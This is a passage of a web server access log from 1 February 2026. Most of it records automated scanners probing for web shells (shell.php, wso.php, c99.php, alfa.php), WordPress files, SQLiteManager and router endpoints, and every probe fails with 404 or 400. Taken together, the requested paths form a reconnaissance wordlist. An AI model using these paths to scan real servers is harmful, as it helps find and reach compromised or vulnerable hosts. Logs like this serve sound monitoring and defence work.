+0000] 200 - GET http 78.131.122.113 "/" [Client 109.105.8.93] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" +[01/Feb/2026:14:52:51 +0000] 404 - GET http www.msftncsi.com "/ncsi.txt" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[01/Feb/2026:14:52:51 +0000] 404 - GET http 78.131.122.113 "/HNAP1/" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[01/Feb/2026:14:52:51 +0000] 404 - GET http 78.131.122.113 "/sqlite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[01/Feb/2026:14:52:51 +0000] 404 - GET http 78.131.122.113 "/sqlitemanager/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[01/Feb/2026:14:52:51 +0000] 404 - GET http 78.131.122.113 "/SQLiteManager/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[01/Feb/2026:14:52:51 +0000] 404 - GET http 78.131.122.113 "/SQLite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[01/Feb/2026:14:52:51 +0000] 404 - GET http 78.131.122.113 "/SQlite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[01/Feb/2026:14:52:51 +0000] 404 - GET http 78.131.122.113 "/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[01/Feb/2026:14:52:51 +0000] 404 - GET http 78.131.122.113 "/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[01/Feb/2026:14:52:51 +0000] 404 - GET http 78.131.122.113 "/SQLiteManager-1.2.4/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[01/Feb/2026:14:52:51 +0000] 404 - GET http 78.131.122.113 "/agSearch/SQlite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[01/Feb/2026:14:54:58 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:15:01:10 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:15:05:23 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:15:20:35 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:15:23:04 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:15:30:30 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:15:34:18 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:15:49:18 +0000] 400 - GET http 78.131.122.113 "/" [Client 138.68.54.11] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[01/Feb/2026:15:49:18 +0000] 400 - GET http 78.131.122.113 "/t4" [Client 138.68.54.11] [Length 252] [Gzip -] "Mozilla/5.0" "-" +[01/Feb/2026:15:49:19 +0000] 400 - GET http 78.131.122.113 "/favicon.ico" [Client 138.68.54.11] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[01/Feb/2026:16:02:17 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:16:04:45 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:16:08:59 +0000] 404 - GET http 78.131.122.113 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:16:12:19 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:16:13:19 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:16:29:05 +0000] 405 - POST http 78.131.122.113 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[01/Feb/2026:16:30:10 +0000] 400 - - http localhost "-" [Client 135.237.126.225] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:16:30:11 +0000] 400 - - http localhost "-" [Client 135.237.126.225] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:16:36:46 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:16:39:45 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:16:41:30 +0000] 200 - GET http 78.131.122.113 "/?XDEBUG_SESSION_START=phpstorm" [Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:16:52:01 +0000] 200 - HEAD http 112.124.42.80 "/" [Client 60.191.125.35] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36" "-" +[01/Feb/2026:16:57:12 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:17:04:25 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:17:04:54 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 9; SM-G965U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" +[01/Feb/2026:17:08:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/166.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/2026.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/muzu.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/reze.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/jsond.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/x7.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/bgymj.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:55 +0000] 404 - GET http profibot.direct.quickconnect.to "//lala.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/8xyz.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/wsd.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/Update/f35.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/la.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/Wp-good.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/tphp.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/a1.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/nyan.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:58 +0000] 404 - GET http profibot.direct.quickconnect.to "//autoload_classmap.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:58 +0000] 404 - GET http profibot.direct.quickconnect.to "//alfa.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:58 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-includes/assets/index.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/luxe.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:08:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/update/wpupex.php/" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/rezor.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:00 +0000] 404 - GET http profibot.direct.quickconnect.to "//doc.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:00 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-admin/user/index.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:00 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-includes/css/about.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:01 +0000] 404 - GET http profibot.direct.quickconnect.to "//install.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/~norapump/hah.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/sto.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:02 +0000] 404 - GET http profibot.direct.quickconnect.to "//x.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:02 +0000] 404 - GET http profibot.direct.quickconnect.to "//test.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/blocks/" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/n3.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/install.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/o.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:03 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-includes/ID3/index.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/class-t.api.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/.trash7309/f/" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:04 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:04 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-includes/customize/index.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:04 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/themes/seotheme/mar.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:05 +0000] 404 - GET http profibot.direct.quickconnect.to "//h.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:05 +0000] 404 - GET http profibot.direct.quickconnect.to "//skin/install/default/security.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/wrt.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:05 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/plugins/Core-EconX/up.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/css/" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/images/c99.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/png.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:07 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-includes/ID3/index.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:07 +0000] 404 - GET http profibot.direct.quickconnect.to "//zwso.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:08 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/languages/index.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:08 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp/wp-includes//index.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/ton.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:09 +0000] 404 - GET http profibot.direct.quickconnect.to "//wso.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/images/fk2e3/" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/a2.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/shell.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/IXR/moon.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/sxo.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:11 +0000] 404 - GET http profibot.direct.quickconnect.to "//admin.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:11 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/mans.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:12 +0000] 404 - GET http profibot.direct.quickconnect.to "//dropdown.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/WordPress/x/" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/ze.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:13 +0000] 404 - GET http profibot.direct.quickconnect.to "//geck.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/menu.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:14 +0000] 404 - GET http profibot.direct.quickconnect.to "//admin/function.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:14 +0000] 404 - GET http profibot.direct.quickconnect.to "//index/function.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/flower.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/ftp.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/mds.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/ahax.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:16 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-admin/class-db.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/cool.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/gm.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:17 +0000] 404 - GET http profibot.direct.quickconnect.to "//simple.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:17 +0000] 404 - GET http profibot.direct.quickconnect.to "//elp.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/bolt.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:17 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/uploads/index.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:18 +0000] 404 - GET http profibot.direct.quickconnect.to "//inputs.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:18 +0000] 404 - GET http profibot.direct.quickconnect.to "/.trash7309/fafa/" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:18 +0000] 404 - GET http profibot.direct.quickconnect.to "/system.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:19 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/maint/" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:19 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/network/" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:20 +0000] 404 - GET http profibot.direct.quickconnect.to "/museu/yhweq.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:20 +0000] 404 - GET http profibot.direct.quickconnect.to "/an.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:20 +0000] 404 - GET http profibot.direct.quickconnect.to "//w.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/gmo.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/gib.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-miiss.php.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/ho/wpup.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:36 +0000] 404 - GET http profibot.direct.quickconnect.to "//moon.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/filesss.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/hey.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:37 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/themes/seotheme/mar.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:37 +0000] 404 - GET http profibot.direct.quickconnect.to "//1337.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:37 +0000] 404 - GET http profibot.direct.quickconnect.to "//buy.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/apsarasarts/okk.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/m.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-is.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/jmfi2.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:39 +0000] 404 - GET http profibot.direct.quickconnect.to "//about/function.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/bnn_.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:39 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/json.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/hzz.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:40 +0000] 404 - GET http profibot.direct.quickconnect.to "//shell20211028.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:41 +0000] 404 - GET http profibot.direct.quickconnect.to "//content.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/ps.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:41 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/themes/about.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/.trash7309/dd/" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/cache.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/ss.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/p.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:42 +0000] 404 - GET http profibot.direct.quickconnect.to 